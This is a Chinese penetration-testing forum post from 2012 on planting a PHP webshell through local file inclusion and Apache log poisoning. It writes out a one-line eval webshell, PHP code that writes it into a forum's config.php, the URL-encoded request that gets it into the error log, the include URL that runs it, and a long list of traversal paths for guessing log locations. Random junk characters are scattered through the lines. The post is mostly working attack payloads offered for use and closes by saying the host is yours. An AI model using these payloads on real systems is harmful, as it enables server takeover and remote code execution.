找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
返回列表 发新帖
查看: 2944|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 % E' ]) s: j5 v" r; t$ O
. T5 G( z: i# c2 n0 {
比如还是这句一句话木马
3 @" W5 x* j' G& m. ~7 p<?eval($_POST[cmd]);?>   * p, K! m: m2 A
( V. e' j9 e$ B  B* Y( q
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 6 |3 \& u. }1 e/ k# P  R
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ; G: c! E. O# P
5 c0 J3 C% ]. A8 A8 p0 g$ N2 _& W
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
6 l5 l4 X! s0 K; x9 Rfclose($fp);?>   //在config.php里写入一句木马语句 & {% _3 l# e/ L3 }
2 n- m0 u/ u: G/ j
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 ! r+ i) k4 m" ?7 d0 b6 T# ]+ J0 E
转换为 5 C, P0 \* C7 x" g6 H$ S
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F ! k. e) Y1 L4 U6 s( b4 P
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 9 l3 P3 r' Q' j% G2 E6 O. v; f
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
3 k9 o1 ?% [: Gfclose%28%24fp%29%3B%3F%3E
8 {6 ^5 }  J- }3 q# W% S& ~我们提交 / U) j% S& ~' ~$ n5 Y
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 8 i0 q6 q& a/ j& M7 r' R
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
+ d  ?2 h& v- p$ ]2 N% `3 n3 U%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B   M+ L$ M3 }8 k; v! X
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E ! z8 I% s5 y2 f; P8 S" L7 j
! `# e+ Y. j. d) M
这样就错误日志里就记录下了这行写入webshell的代码。 : n( j8 y0 g4 s6 W, ^* h0 v" X5 k
我们再来包含日志,提交 ; f/ E2 i! j! R9 m6 Y  s" j
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
9 ?! T, a1 g- d) |- x3 j- F' K2 v% e
这样webshell就写入成功了,config.php里就写入一句木马语句
& U: m! E+ C" _+ w# F: M+ F8 O2 yOK. 3 e/ y9 [8 O1 Q
http://www.xxx.com/forum/config.php这个就成了我们的webshell 8 k5 ~- O  [% J$ d0 d+ N6 C) N
直接用lanker的客户端一连,主机就是你的了。
$ [$ `+ t; C) E3 v# w% D/ n. V% ]6 P% j# c& C
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
# ]; y/ V( ~; z3 _0 N/ q+ e+ D" a' b- Z; }
其他的日志路径,你可以去猜,也可以参照这里。
" ^1 r) o( f4 m: ^" p" f../../../../../../../../../../var/log/httpd/access_log
7 B2 {, e2 L) l, j( P../../../../../../../../../../var/log/httpd/error_log 7 J8 A. W( J, p  k4 B
../apache/logs/error.log " x6 M7 f" i* q; s9 O5 _3 f
../apache/logs/access.log ) m0 d( ]2 y. }: O
../../apache/logs/error.log 5 W) x9 p/ B# a7 ?' D$ N) L: n
../../apache/logs/access.log
, Q! k3 E$ Q: l9 \* K* O+ r../../../apache/logs/error.log
" c, L# Q5 u- @9 ^" v8 A/ \../../../apache/logs/access.log
6 j% g0 b5 {- v% h; i" \../../../../../../../../../../etc/httpd/logs/acces_log
; S- X5 [( z' E../../../../../../../../../../etc/httpd/logs/acces.log
7 I8 y/ Y4 \$ ]$ i* K" _( `5 M9 p: G% P../../../../../../../../../../etc/httpd/logs/error_log
1 V  d& T0 o: z4 e( [$ b! S, {0 Z0 _../../../../../../../../../../etc/httpd/logs/error.log
8 {1 O4 Z- h: S* S1 F0 n+ G../../../../../../../../../../var/www/logs/access_log
; T$ F, y, j; M+ F../../../../../../../../../../var/www/logs/access.log 4 B0 Z. ^$ d& U& V
../../../../../../../../../../usr/local/apache/logs/access_log $ ]9 u6 k8 \* V, b
../../../../../../../../../../usr/local/apache/logs/access.log
& Z- s7 h. G$ C4 \( A- e! \../../../../../../../../../../var/log/apache/access_log % q( k+ h  o  l% M3 H0 r7 i
../../../../../../../../../../var/log/apache/access.log
% w8 a6 Z5 x' w# \$ {) y7 @../../../../../../../../../../var/log/access_log 3 P* o/ ~. E2 \2 _# k" n
../../../../../../../../../../var/www/logs/error_log ) o6 I, g: R' k7 N1 h: x5 W0 j  a
../../../../../../../../../../var/www/logs/error.log
! h* {0 I7 ~: O& x9 E3 `../../../../../../../../../../usr/local/apache/logs/error_log
$ S, i8 Z4 P& ~% V* q: S! u../../../../../../../../../../usr/local/apache/logs/error.log ) M1 y/ |. N5 [9 P( ?( g; m
../../../../../../../../../../var/log/apache/error_log 6 g* h; ?$ U' O0 O% _" N; L# X# m. y( C  J
../../../../../../../../../../var/log/apache/error.log
  |: m3 Z& k  [' _, g) `$ q9 C../../../../../../../../../../var/log/access_log
! d! R. O2 G& m' `8 M../../../../../../../../../../var/log/error_log , T4 O5 R1 i0 s( C) ]' k
/var/log/httpd/access_log         }" i+ ~4 K3 l* {5 }. m
/var/log/httpd/error_log     
/ H' I1 ?. G5 _# O7 B../apache/logs/error.log     * w9 S9 E! T4 ^( @/ n
../apache/logs/access.log , A$ Z6 P; ~! X- T' p+ b
../../apache/logs/error.log
' z5 o4 a# n2 {, c../../apache/logs/access.log
$ N# l- I/ e) _% l../../../apache/logs/error.log
1 N- c9 K# z6 P8 \. s+ _../../../apache/logs/access.log
% d! _0 ]+ W- W! n& ?2 c0 a/etc/httpd/logs/acces_log . s1 [9 _7 {' f+ {
/etc/httpd/logs/acces.log
' O- Q# `7 c+ X! ^. a/etc/httpd/logs/error_log ! d, c. S+ w, J: Z
/etc/httpd/logs/error.log 6 W1 ~5 N+ E) c4 b
/var/www/logs/access_log ' `, H8 ^6 f4 o
/var/www/logs/access.log $ Q8 `* d9 J/ T4 ], t+ _% f+ V
/usr/local/apache/logs/access_log 6 M( _0 t! ^) z1 p8 L. \
/usr/local/apache/logs/access.log - H8 z4 [& F% \
/var/log/apache/access_log 0 N( X' _: p2 t& Y4 g/ \- u; t
/var/log/apache/access.log
/ c& @( G! L, k- E2 `/var/log/access_log & E2 U8 z: b8 ]$ z; |4 g
/var/www/logs/error_log
) i0 j: v+ u9 Q1 x1 I/var/www/logs/error.log # g7 ~" \) F6 |2 D( J
/usr/local/apache/logs/error_log
9 f7 t' f1 P0 b" ~/usr/local/apache/logs/error.log 1 q2 q3 V& F/ g' L/ M
/var/log/apache/error_log
0 Y3 p& }- P+ i4 k* f2 G. Y/var/log/apache/error.log 4 d- K+ \; k( T( Q1 l" M
/var/log/access_log
9 C5 k. L6 B( I8 c% P/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表